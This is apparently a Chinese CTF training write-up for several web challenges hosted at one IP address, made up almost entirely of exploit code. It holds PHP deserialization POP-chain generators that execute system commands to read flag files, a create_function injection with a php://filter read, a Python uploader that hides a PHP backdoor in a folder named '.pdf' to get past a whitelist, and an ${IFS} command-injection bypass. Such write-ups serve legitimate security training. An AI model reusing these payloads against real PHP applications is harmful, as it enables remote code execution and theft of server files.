第一周训练web wp

http://47.101.176.40:11114/

<?php
$command="system";
$argv='cat ./flag.php';
class QMRb7
{
    public $a;
    public $b;
}
class KOkjs
{
    public $a;
    public $b;
}
class MGkk8
{
    public $a="RPG";
    public $b;
}
class y97pu
{
    public $a;
    public $b;
    public $c;
}
$a=new y97pu();
$a2=new KOkjs();
$a2->a=new MGkk8();
$a2->a->b=new QMRb7();
$a2->a->b->a=$command;
$a2->a->b->b=$argv;
$c=array($a,$a2);
$c[0]->a=&$c[0]->b;
$c[0]->c=&$c[1];
echo serialize($c).PHP_EOL;


http://47.101.176.40:9004/

绕过rmdir函数，这里is_dir函数是检查是否为文件夹，rmdir是删除空的文件夹。所以这里可以利用白名单绕过，构造一个文件夹名为.pdf的文件夹，里面包含一个php后门：


然后上传压缩包：

import requests
import base64
url='http://47.101.176.40:9004/'
str=open("shell.zip","rb").read()
str=base64.b64encode(str)
data={
    'base64':str,
}
r=requests.post(url,data=data)
print(r.content)

getshell：

http://47.101.176.40:12223/

<?php
namespace Control\State {
    class StopHook {
        protected $processes;
        public function __construct() {
            $this -> processes = array(new \Faker\MyGenerator());
        }
    }
    require 'closure/autoload.php';
    $payload = new StopHook();
    echo base64_encode(serialize($payload));
}

namespace Faker {
    class MyGenerator {
        protected $defaultValue;
        public function __construct() {
            $this -> defaultValue = new \Method\Func\GetFile();
        }
    }
}

namespace Method\Func{
    class GetFile {
        private $flag;
        public function __construct() {
            $this -> flag = new \Method\Func\GetDefault();
            $this -> value = 'test';
        }
    }
}

namespace Method\Func{
    class GetDefault {
        private $source;
        public function __construct()  {
            $this -> source = new \Method\Func\GenerateFile();
            $this -> source -> flag = 'myTest';
        }
    }
}

namespace Method\Func{
    class GenerateFile {
        public $flag;
        protected $buffer;

        public function __construct() {
            $function = function(){ eval(system('cat /flag')); };
            $this -> source -> generate = new \Opis\Closure\SerializableClosure($function);
        }
    }
}


http://47.101.176.40:11112/

<?php
class A{
    public $c;
    public function __construct()
    {
        $this->c=new B();
    }
}
class B{
    public $b;
    public function __construct()
    {
        $this->b=new C();
    }
}
class C{
    public function getflag(){
        echo readfile("/flag");
    }
}
$a=new A();
echo urlencode(serialize($a));


http://47.101.176.40:13334/

<?php

class a {
    public function __construct($a)
    {
        $this->test = $a;
    }
}

abstract class b {
    private $b = 1;

    public function __construct($a)
    {
        $this->b = $a;
    }
}

class c extends b {
    private $call;
    protected $value;

    public function __construct($a,$b)
    {
        $this->call = $a;
        $this->value = $b;
    }

    public function setB($c)
    {
        parent::__construct($c);
    }
}

class d {
    public $value;

    public function __construct($a) {
        $this->value = $a;
    }
}

$c = new C(
    [new d("system"),"eval"],
    [new d("cat /flag"),"eval"]
);

$c->setB([$c,"eval"]);
$exp = new a($c);

echo base64_encode(serialize($exp));


http://47.101.176.40:10011/

首先使用mv移动fla.php的内容到可读文件中：

c=mv${IFS}fl?.php${IFS}qwqw

然后访问qwqw：


http://47.101.176.40:8778/

<?php
class A {
    public $var;
}
class B{
    public $func;
    public $arg;
}
$a=new A;
$a->var=new B;
$a->var->func="create_function";
$a->var->arg='return(1);}require(~('.strval(~('php://filter/read=convert.base64-encode/resource=flag.php')).'));//';
echo urlencode(serialize($a));
?>


http://47.101.176.40:3333/index.php

https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html

tnt师傅提示是2022虎符的easyphp